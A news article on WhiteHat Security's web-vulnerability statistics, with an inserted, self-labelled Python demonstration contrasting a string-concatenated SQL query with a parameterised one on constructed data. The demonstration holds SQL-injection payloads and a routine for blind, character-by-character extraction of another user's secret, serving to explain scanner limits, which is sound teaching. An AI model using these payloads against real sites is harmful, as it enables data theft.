Report: Cross-Site Scripting Still Most Common Web Vulnerability

New WhiteHat Security data shows that Websites now free of vulnerabilities started out with about half as many bugs as sites still riddled with them, but the same kinds of bugs

WhiteHat Security's new Website security statistics released today came with a mostly unchanged list of the top 10 vulnerabilities -- cross-site scripting (XSS) is still king -- but also a peek at some characteristics of Websites that are free of vulnerabilities.

Among the 1,364 Websites scanned by WhiteHat and included in the report, 36 percent had no vulnerabilities at all, and 17 percent had never had a serious one. WhiteHat counted 1,800 vulnerabilities. But Jeremiah Grossman, founder and CTO of WhiteHat, says the real tidbit here is what types of bugs the clean sites had eradicated.

"What was striking was not the volume of zero-vulnerability Websites, but that this shows that those that have had vulns [in the past] were characteristically identical to those Websites that do have vulns today," Grossman says. The vulnerability-free sites had experienced the same issues as the bug-ridden ones, he says, demonstrating it is possible to sweep a site clean of vulnerabilities.

"They have the same set of issues," he says. There's nothing "magical" about their approach, Grossman adds, except they had made an effort to clean their sites, and that most had started with about half as many bugs as the ones that are still carrying vulnerabilities. The finding that the bugs were common across the board demonstrates how any Website has the risk of being compromised, according to the report.

Grossman says the data shows those who care about their Web application's security tend to have fewer bugs when they go into production. "This shows that it's then easier to get to zero over time," he says.

WhiteHat found that 83 percent of the Websites have had at least one serious vulnerability -- meaning either high, critical, or urgent as defined by PCI-DSS -- and 64 percent currently harbor at least one serious vulnerability. The average number of serious vulnerabilities per site is 16.7, and there's an average of 6.5 unresolved severe bugs in each Website, according to WhiteHat's findings. Social networking and education markets have the most serious vulnerabilities in their Websites, with 86 percent of social networking sites and 83 percent of education Websites harboring these flaws.

The top 10 vulnerabilities are XSS (66 percent); information leakage (49 percent); content spoofing (31 percent); insufficient authorization (19 percent); SQL injection (18 percent); predictable resource location (14 percent); cross-site request forgery (12 percent); session fixation (12 percent); HTTP response splitting (10 percent); and abuse of functionality (9 percent).

Grossman says SQL injection and CSRF are under-represented in the Top 10. SQL injection flaws can be difficult to detect in scans: developers who disable verbose database error messages as a way to protect against SQL injection also inadvertently hide the error output that scanners rely on to find SQL injection flaws. And even with this best practice in place, blind SQL injection attacks can still be waged against a Website, according to WhiteHat. CSRF, meanwhile, is notoriously difficult to detect.
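The point above (suppressing verbose errors blinds error-based scanning but does not stop blind injection) is easy to see in code. The following is an added example, not code from the article or from WhiteHat: a toy login lookup that concatenates user input into a SQL string, run against an in-memory SQLite database with constructed rows, beside a parameterised fix. Two scanner-style probes are run against it: an error-based probe that only fires while database errors are echoed, and a boolean-based blind probe that still finds the flaw when errors are suppressed and can then read a secret out of the database one character at a time. The table, data, handler names and probe strings are all assumptions for the demonstration.

```python
"""Error-based vs. blind SQL injection detection (added example, constructed data)."""
import sqlite3

# Strings a scanner might look for when the application echoes DB errors.
ERROR_SIGNATURES = ("unrecognized token", "syntax error", "sqlite", "mysql", "ora-")


def build_db():
    """Constructed sample data: two users with secrets."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users (name, secret) VALUES (?, ?)",
                     [("alice", "s3cr3t"), ("bob", "hunter2")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, name, verbose_errors):
    """Vulnerable handler: input is concatenated into the statement.
    Returns a (status, body) pair standing in for an HTTP response."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        if verbose_errors:
            return 500, "Database error: " + str(exc)   # leaks the DB error text
        return 500, "Something went wrong"                # generic message
    if rows:
        return 200, "Welcome, " + rows[0][0]
    return 404, "No such user"


def lookup_fixed(conn, name):
    """Fixed handler: a bound parameter can never change the statement."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()
    if rows:
        return 200, "Welcome, " + rows[0][0]
    return 404, "No such user"


def error_based_probe(handler):
    """Scanner heuristic: inject a lone quote and look for a DB error string."""
    _status, body = handler("alice'")
    lowered = body.lower()
    return any(sig in lowered for sig in ERROR_SIGNATURES)


def blind_probe(handler):
    """Boolean-based blind check: a true condition must leave the page
    unchanged and a false one must change it. Needs no error output."""
    baseline = handler("alice")
    true_case = handler("alice' AND '1'='1")
    false_case = handler("alice' AND '1'='2")
    return true_case == baseline and false_case != baseline


def blind_extract_secret(handler, victim, max_len=16):
    """Read another user's secret through the boolean oracle, one
    character at a time (SQLite syntax; substr() is 1-indexed)."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    baseline = handler("alice")
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = ("alice' AND substr((SELECT secret FROM users WHERE name='%s'),%d,1)='%s"
                       % (victim, pos, ch))
            if handler(payload) == baseline:
                recovered += ch
                break
        else:
            break   # no character matched: end of the value
    return recovered


if __name__ == "__main__":
    db = build_db()
    loud = lambda n: lookup_vulnerable(db, n, verbose_errors=True)
    quiet = lambda n: lookup_vulnerable(db, n, verbose_errors=False)
    fixed = lambda n: lookup_fixed(db, n)
    for label, h in (("verbose errors", loud), ("errors hidden", quiet), ("parameterised", fixed)):
        print("%-16s error-based: %-5s blind: %s" % (label, error_based_probe(h), blind_probe(h)))
    print("blind extraction of bob's secret:", blind_extract_secret(quiet, "bob"))
```

Hiding the error text defeats only the first probe; the second needs nothing but a visible difference between a true and a false condition, which is exactly what a blind attacker uses. Only the parameterised handler resists both.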

On average, it takes 67 days to fix an XSS bug, 62 days for SQL injection, 93 days for CSRF, and 106 days for session fixation.

Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing and Secure Enterprise.
